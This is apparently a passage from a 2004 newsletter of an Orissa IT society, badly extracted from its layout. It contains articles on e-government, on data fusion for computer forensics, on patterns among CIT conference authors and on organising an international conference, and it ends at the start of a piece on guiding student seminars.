administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

